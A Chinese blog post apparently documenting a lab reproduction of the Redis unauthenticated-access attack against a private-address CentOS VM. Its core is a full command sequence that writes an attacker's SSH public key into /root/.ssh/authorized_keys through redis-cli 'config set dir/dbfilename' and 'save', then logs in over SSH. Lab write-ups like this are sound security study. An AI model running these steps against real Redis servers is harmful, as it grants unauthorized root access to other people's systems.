1. redis未授权漏洞复现(写入公钥利用)

 先复现一篇公钥写入的利用方式,以便明天使用,后续补上其他利用方式。

一、环境准备

  1.靶机环境 CenOS 7 64 redis-2.8.12   192.168.0.111

  2.攻击机   kail  64 redis-2.8.12     

 

  环境安装有几个坑:

  1.靶机安装redis默认服务端不启动,需要手动开启

  附链接:https://www.cnblogs.com/williamjie/p/9370196.html  

    进入bin目录:redis-server /redis-2.8.12/MyConfig/redis.conf  //我自己的目录启动方式

  2.kail攻击机默认不开ssh,没有.ssh目录,需要手动操作

  附链接:https://blog.csdn.net/weixin_41708020/article/details/106731997

    根据以上链接操作,最后执行:ssh localhost  即可生成 .ssh 目录

  

 

 二、写入公钥

  1.  ssh-keygen -t rsa  //执行生成key命令

  

   2.  (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt  //将公钥写入txt

   

    这里最好开两个命令窗,一个在ssh下,一个在redis/src下

  3.  cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx  //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中

   

 

   4.  ./redis-cli -h 192.168.0.111    //使用客户端登录目标

     config set dir /root/.ssh      //设置存储公钥路径

     config set dbfilename authorized_keys  //设置文件名称

   

 

   5.   get xxx      //查看缓存

      save     //保存缓存到目标主机路径及文件下

      exit    //退出

  

 

   6. ssh 192.168.0.111  //成功登录

  

 

 参考连接:

https://blog.csdn.net/Jiajiajiang_/article/details/81368212?from=groupmessage

https://mp.weixin.qq.com/s/Vj24aRbr3P7Pg59HE3SpRQ

      

 

  

 

 

      

posted @ 2020-11-18 22:54  黑岗0x0001  阅读(4074)  评论(0编辑  收藏  举报